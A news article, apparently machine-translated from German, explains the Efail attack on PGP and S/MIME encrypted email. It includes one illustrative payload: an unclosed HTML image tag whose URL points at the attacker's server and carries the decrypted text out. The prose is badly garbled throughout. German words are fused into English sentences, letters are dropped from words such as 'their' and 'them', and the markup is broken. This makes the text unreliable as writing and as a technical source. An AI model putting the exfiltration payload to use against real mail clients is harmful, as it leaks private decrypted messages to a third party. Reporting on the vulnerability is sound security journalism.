Breaking News                 Latest News            Usa News                 Diet News

How You Can Set Yourself Up For Success Professionally
A security issue called Efail endangers the email encryption of PGP and S/MIME. The problem: The technology has stopped at the level of the Nineties.

PGP and S/MIME: unsecured encryption

A security issue called Efail endangers the email encryption of PGP and S/MIME. The problem: The technology has stopped at the level of the Nineties.

PGP and S/MIME: unsecured encryption
Content
  • Page 1 — Unsecured encryption
  • Page 2 — debate on responsibility
  • Read on a page

    A team of VonIT security researchers from Bochum and Münster has discovered verschiedeneSicherheitsprobleme in encryption technologies for e-mails. They have baptized ir attack Efail. Dabeinutzen a weakness of old but still used encryption technologies called OPENPGP and S/MIME and combine m with possibilities Vonmodernen mail programs that can display mails with images and or contents – so-called HTML mails.

    So far, DieMailverschlüsselung was particularly critical because sievergleichsweise is difficult to use and to set up. In practice, refore, only a small minority of users and users use encrypted e-mails. For most users, attack has also WenigPraxisrelevanz – normal, i.e. unencrypted emails are just as unsicherwie y were before. Likewise not affected by attack is Diesogenannte transport encryption with TLS. However, it only protects user and its mail provider.

    Orwise encryption MitPGP or S/MIME: If users use m correctly, it offers a high degree of security, one thought anyway. This view now gets some scratches, even if researchers do not directly attack encryption itself. With a trick, however, attackers can have content DerNachrichten sent after decryption.

    The encryption is bypassed

    How is that possible? Both Technikennutzen encryption modes, which do not guarantee aunticity of data. This means that an attacker cannot read mail directly, he kannaber manipulate its contents. The details are a little more complex, Abervereinfacht said: If an attacker accesses an encrypted Mailhat, for example, by taking m with a man-in--middle attack, he can generate Eineauf ir second encrypted mail based on m. It has partially anor, controlled content.

    This property uses Efailaus. Modern mail programs and also webmailers make it possible to make e-mails in several parts extensive. In this way, images or fonts can be used Hispanics design possibilities of HTML standard, which also represents dieBasis of websites. The trick that is used at Efail: email is rewritten so that it sends an image from attacker's server lädtund unencrypted content of original mail.

    For example: DieAngreiferin sends an HTML part as first part of a message, derbeispielsweise loads an image, but does not close HTML tag. So about lt; img src = "http://efail.de/. Second, it attaches encrypted part of a mail that you have read. ImMailclient of victim now happens: first, encrypted part is decrypted. Second, in this case, an image is loaded from server DerAngreiferin. The path is appended to content of decrypted Textteilscodiert, such as: Http://efail.de/GEHEIMER_TEXT

    An attacker does not decrypt diemail himself, but he allows recipient of mail to decrypt message and n send it in plain text to a server under his control. This also has consequence that even in past Verschickteverschlüsselte messages are at risk.

    Breaking News Headlines

    Trademy.com - Learn the Ins and Outs of Trading with Trademy
    Trademy.com - Learn the Ins and Outs of Trading with Trademy
    What goods can be transported by sea
    What goods can be transported by sea
    How You Can Set Yourself Up For Success Professionally
    How You Can Set Yourself Up For Success Professionally
    How to find a great Professional Essay Writing Service
    How to find a great Professional Essay Writing Service
    4 Over-The-Counter Medicines That Can Kill You
    4 Over-The-Counter Medicines That Can Kill You
    3 Things Every Pro Trader Does That You Should Too
    3 Things Every Pro Trader Does That You Should Too
    How to deal with dynamics of Forex market
    How to deal with dynamics of Forex market
    Use Etobicoke Windows To Have A Better Lifestyle
    Use Etobicoke Windows To Have A Better Lifestyle
    How to Find Higher Returns During a Low Return Era
    How to Find Higher Returns During a Low Return Era
    Cassidy Charette's Wrongful Death Settlement Reached
    Cassidy Charette's Wrongful Death Settlement Reached
    Quick loans during emergency situations – How can they offer help?
    Quick loans during emergency situations – How can they offer help?
    Try not to have time to read newspaper or watch news? Stay updated with monacart.com
    Try not to have time to read newspaper or watch news? Stay updated with monacart.com
    Pages
    NEWS ARCHIVES